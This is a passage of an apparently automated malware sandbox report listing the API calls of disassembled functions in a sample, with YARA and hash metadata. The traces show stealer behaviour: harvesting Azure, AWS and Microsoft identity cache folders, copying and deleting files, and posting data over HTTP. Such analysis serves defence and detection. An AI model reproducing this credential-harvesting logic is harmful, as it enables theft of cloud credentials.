                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 047E9C53
                                                • Part of subcall function 047E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 047E9C78
                                                • Part of subcall function 047E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 047E9C98
                                                • Part of subcall function 047E9C27: ReadFile.KERNEL32(000000FF,?,00000000,047E16F6,00000000), ref: 047E9CC1
                                                • Part of subcall function 047E9C27: LocalFree.KERNEL32(047E16F6), ref: 047E9CF7
                                                • Part of subcall function 047E9C27: CloseHandle.KERNEL32(000000FF), ref: 047E9D01
                                                • Part of subcall function 047F9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 047F90B9
                                              • strtok_s.MSVCRT ref: 047F0582
                                              • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 047F05C9
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047F05D0
                                              • StrStrA.SHLWAPI(00000000,00421618), ref: 047F05EC
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 047F05FA
                                                • Part of subcall function 047F8B47: malloc.MSVCRT ref: 047F8B4F
                                                • Part of subcall function 047F8B47: strncpy.MSVCRT ref: 047F8B6A
                                              • StrStrA.SHLWAPI(00000000,00421620), ref: 047F0636
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 047F0644
                                              • StrStrA.SHLWAPI(00000000,00421628), ref: 047F0680
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 047F068E
                                              • StrStrA.SHLWAPI(00000000,00421630), ref: 047F06CA
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 047F06DC
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 047F0769
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 047F0781
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 047F0799
                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 047F07B1
                                              • lstrcat.KERNEL32(?,0042164C), ref: 047F07C9
                                              • lstrcat.KERNEL32(?,00421660), ref: 047F07D8
                                              • lstrcat.KERNEL32(?,00421670), ref: 047F07E7
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F07FA
                                              • lstrcat.KERNEL32(?,00421678), ref: 047F0809
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F081C
                                              • lstrcat.KERNEL32(?,0042167C), ref: 047F082B
                                              • lstrcat.KERNEL32(?,00421680), ref: 047F083A
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F084D
                                              • lstrcat.KERNEL32(?,00421688), ref: 047F085C
                                              • lstrcat.KERNEL32(?,0042168C), ref: 047F086B
                                              • lstrcat.KERNEL32(?,00000000), ref: 047F087E
                                              • lstrcat.KERNEL32(?,00421698), ref: 047F088D
                                              • lstrcat.KERNEL32(?,0042169C), ref: 047F089C
                                              • strtok_s.MSVCRT ref: 047F08E0
                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 047F08F5
                                              • memset.MSVCRT ref: 047F0944
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                              • String ID:
                                              • API String ID: 3689735781-0
                                              • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                              • Instruction ID: 946761aa0abe9165517ba4dae53b9f6b8ccaa96ecb5474209f335a9d06dc3f53
                                              • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                              • Instruction Fuzzy Hash: 2AD14C75A40208ABDB14FBF0DD99EEEB779BF14304F504519E206A6390DA74BA09CB61
                                              APIs
                                                • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                              • StrCmpCA.SHLWAPI(?,02BEB110), ref: 00405A13
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                              • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02BEB0B0,00000000,?,02BB4AF0,00000000,?,00421A1C), ref: 00405E71
                                              • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                              • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                              • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                              • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                              • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                              • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                              • memcpy.MSVCRT(?), ref: 00405EFE
                                              • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                              • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                              • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                              • HttpOpenRequestA.WININET(00000000,02BEB080,?,02BEA3E0,00000000,00000000,00400100,00000000), ref: 00405BF8
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                              • String ID: "$"$------$------$------
                                              • API String ID: 1406981993-2180234286
                                              • Opcode ID: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                              • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                              • Opcode Fuzzy Hash: d584931218870f5a18272302018c77e53fc5fb951b6f20bec4b58dd8f39eeae3
                                              • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                              APIs
                                              • memset.MSVCRT ref: 00414D87
                                                • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                              • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                              • memset.MSVCRT ref: 00414E13
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                              • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                              • memset.MSVCRT ref: 00414E9F
                                              • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                              • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,02BEB060,?,000003E8), ref: 00414A4A
                                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                              • memset.MSVCRT ref: 00414F2B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                              • API String ID: 4017274736-156832076
                                              • Opcode ID: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                              • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                              • Opcode Fuzzy Hash: d73f59eecc85cf289b4a9e886a5dd23b124dff58e220292f3412a81ba503d5a0
                                              • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,02BB4BE0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                              • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                              • lstrcatA.KERNEL32(?,00000000,02BE5C30,00421474,02BE5C30,00421470,00000000), ref: 0040D208
                                              • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                              • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                              • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                              • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                              • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                              • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                              • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                              • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                                • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02BE5AC0,?,0042110C,?,00000000), ref: 0041A82B
                                                • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                              • lstrlenA.KERNEL32(?), ref: 0040D32A
                                              • lstrlenA.KERNEL32(?), ref: 0040D339
                                              • memset.MSVCRT ref: 0040D388
                                                • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                              • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
                                              • String ID:
                                              • API String ID: 2775534915-0
                                              • Opcode ID: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                              • Instruction ID: 94f9062ed3f4a6e26da847402fe0a382ec35b8ad99342330bde04fa79d6a5422
                                              • Opcode Fuzzy Hash: e374f418a718bf29b4bd137cb307ac5de3fe55102a97a16a6c9de5ebd6bfbcf7
                                              • Instruction Fuzzy Hash: D2E17D75950108ABCB04FBE1DD96EEE7379BF14304F10405EF107B60A1DE38AA5ACB6A
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,047E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FAC,00420E17), ref: 047F8DED
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 047ED1EA
                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 047ED32E
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047ED335
                                              • lstrcat.KERNEL32(?,00000000), ref: 047ED46F
                                              • lstrcat.KERNEL32(?,00421478), ref: 047ED47E
                                              • lstrcat.KERNEL32(?,00000000), ref: 047ED491
                                              • lstrcat.KERNEL32(?,0042147C), ref: 047ED4A0
                                              • lstrcat.KERNEL32(?,00000000), ref: 047ED4B3
                                              • lstrcat.KERNEL32(?,00421480), ref: 047ED4C2
                                              • lstrcat.KERNEL32(?,00000000), ref: 047ED4D5
                                              • lstrcat.KERNEL32(?,00421484), ref: 047ED4E4
                                              • lstrcat.KERNEL32(?,00000000), ref: 047ED4F7
                                              • lstrcat.KERNEL32(?,00421488), ref: 047ED506
                                              • lstrcat.KERNEL32(?,00000000), ref: 047ED519
                                              • lstrcat.KERNEL32(?,0042148C), ref: 047ED528
                                              • lstrcat.KERNEL32(?,00000000), ref: 047ED53B
                                              • lstrcat.KERNEL32(?,00421490), ref: 047ED54A
                                                • Part of subcall function 047FAA87: lstrlen.KERNEL32(047E516C,?,?,047E516C,00420DDE), ref: 047FAA92
                                                • Part of subcall function 047FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 047FAAEC
                                              • lstrlen.KERNEL32(?), ref: 047ED591
                                              • lstrlen.KERNEL32(?), ref: 047ED5A0
                                              • memset.MSVCRT ref: 047ED5EF
                                                • Part of subcall function 047FACD7: StrCmpCA.SHLWAPI(0064A350,047EAA0E,?,047EAA0E,0064A350), ref: 047FACF6
                                              • DeleteFileA.KERNEL32(00000000), ref: 047ED61B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                              • String ID:
                                              • API String ID: 1973479514-0
                                              • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                              • Instruction ID: 2d4f13dd0decb3843b2882c1baa42e5bdcaf12d3948a8a3be938ab4acf38519b
                                              • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                              • Instruction Fuzzy Hash: E2E15F75950208ABDB18FBE0DD99DEE7379BF14305F504159E20AA63A0DE34BA09CF61
                                              APIs
                                                • Part of subcall function 047FAA07: lstrcpy.KERNEL32(?,00000000), ref: 047FAA4D
                                                • Part of subcall function 047E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A51
                                                • Part of subcall function 047E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A68
                                                • Part of subcall function 047E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 047E4A7F
                                                • Part of subcall function 047E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 047E4AA0
                                                • Part of subcall function 047E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 047E4AB0
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 047E5C5F
                                              • StrCmpCA.SHLWAPI(?,0064A480), ref: 047E5C7A
                                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 047E5DFA
                                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421A20,00000000,?,0064A0F0,00000000,?,0064A2F0,00000000,?,00421A1C), ref: 047E60D8
                                              • lstrlen.KERNEL32(00000000), ref: 047E60E9
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 047E60FA
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 047E6101
                                              • lstrlen.KERNEL32(00000000), ref: 047E6116
                                              • memcpy.MSVCRT(?,00000000,00000000), ref: 047E612D
                                              • lstrlen.KERNEL32(00000000), ref: 047E613F
                                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 047E6158
                                              • memcpy.MSVCRT(?), ref: 047E6165
                                              • lstrlen.KERNEL32(00000000,?,?), ref: 047E6182
                                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 047E6196
                                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 047E61B3
                                              • InternetCloseHandle.WININET(00000000), ref: 047E6217
                                              • InternetCloseHandle.WININET(00000000), ref: 047E6224
                                              • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 047E5E5F
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                              • InternetCloseHandle.WININET(00000000), ref: 047E622E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1884696969.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_47e0000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                              • String ID:
                                              • API String ID: 1703137719-0
                                              • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                              • Instruction ID: 06b7f7060150f7214c290fdd98dde50cf608334f9a644348cdf98a299a007879
                                              • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                              • Instruction Fuzzy Hash: A712D275960218ABDB15EBA0DD98FEEB379BF54704F404199A20A62391EF703B89CF50
                                              APIs
                                                • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,02BE9208,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                              • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                              • StrStrA.SHLWAPI(?,02BE92E0,00420B52), ref: 0040CAF7
                                              • StrStrA.SHLWAPI(00000000,02BE92F8), ref: 0040CB1E
                                              • StrStrA.SHLWAPI(?,02BE9F68,00000000,?,00421458,00000000,?,00000000,00000000,?,02BE5BA0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                              • StrStrA.SHLWAPI(00000000,02BE9E88), ref: 0040CCB9
                                                • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,02BE5C10), ref: 0040C871
                                                • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                              • StrStrA.SHLWAPI(?,02BE9E88,00000000,?,0042145C,00000000,?,00000000,02BE5C10), ref: 0040CD5A
                                              • StrStrA.SHLWAPI(00000000,02BE5DA0), ref: 0040CD71
                                                • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                              • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                              • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1883260883.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1883260883.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1883260883.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_nGmqbXROga.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                              • String ID:
                                              • API String ID: 3555725114-3916222277
                                              • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                              • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                              • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                              • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                              APIs
                                                • Part of subcall function 047FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 047FA9EF
                                                • Part of subcall function 047FAB87: lstrcpy.KERNEL32(00000000,?), ref: 047FABD9
                                                • Part of subcall function 047FAB87: lstrcat.KERNEL32(00000000), ref: 047FABE9
                                                • Part of subcall function 047FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 047FAB6C
                                                • Part of subcall function 047FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FAC,00420E17), ref: 047FAC2C
                                                • Part of subcall function 047FAC17: lstrcpy.KERNEL32(00000000), ref: 047FAC6B
                                                • Part of subcall function 047FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 047FAC79
